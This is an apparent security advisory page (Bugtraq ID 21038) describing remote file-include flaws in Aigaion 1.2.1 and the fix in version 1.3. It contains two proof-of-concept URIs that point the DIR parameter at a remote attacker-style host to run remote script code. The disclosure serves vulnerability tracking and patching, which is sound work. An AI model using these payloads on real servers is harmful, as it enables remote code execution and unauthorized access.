Aigaion Multiple Remote File Include Vulnerabilities
BID:21038
Info
Aigaion Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 21038 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 13 2006 12:00AM |
| Updated: | Jan 25 2007 04:13PM |
| Credit: | navairum is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Aigaion Web based bibliography management system 1.2.1 |
| Not Vulnerable: |
Aigaion Web based bibliography management system 1.3 |
Discussion
Aigaion Multiple Remote File Include Vulnerabilities
Aigaion is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Version 1.2.1 is vulnerable to these issues; other versions may also be affected.
Aigaion is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Version 1.2.1 is vulnerable to these issues; other versions may also be affected.
Exploit / POC
Aigaion Multiple Remote File Include Vulnerabilities
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[PATH]/_basicfunctions.php?DIR=http://www.example2.com/uhoh.txt?
http://www.example.com/path/pageactionauthor.php?DIR=http://www.example2.com/uhoh.txt?
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[PATH]/_basicfunctions.php?DIR=http://www.example2.com/uhoh.txt?
http://www.example.com/path/pageactionauthor.php?DIR=http://www.example2.com/uhoh.txt?
Solution / Fix
Aigaion Multiple Remote File Include Vulnerabilities
Solution:
The vendor has released version 1.3 to address these issues; please see the reference section for details.
Aigaion Web based bibliography management system 1.2.1
Solution:
The vendor has released version 1.3 to address these issues; please see the reference section for details.
Aigaion Web based bibliography management system 1.2.1
-
Aigaion aigaion_1.3.zip
http://downloads.sourceforge.net/aigaion/aigaion_1.3.zip
References
Aigaion Multiple Remote File Include Vulnerabilities
References:
References: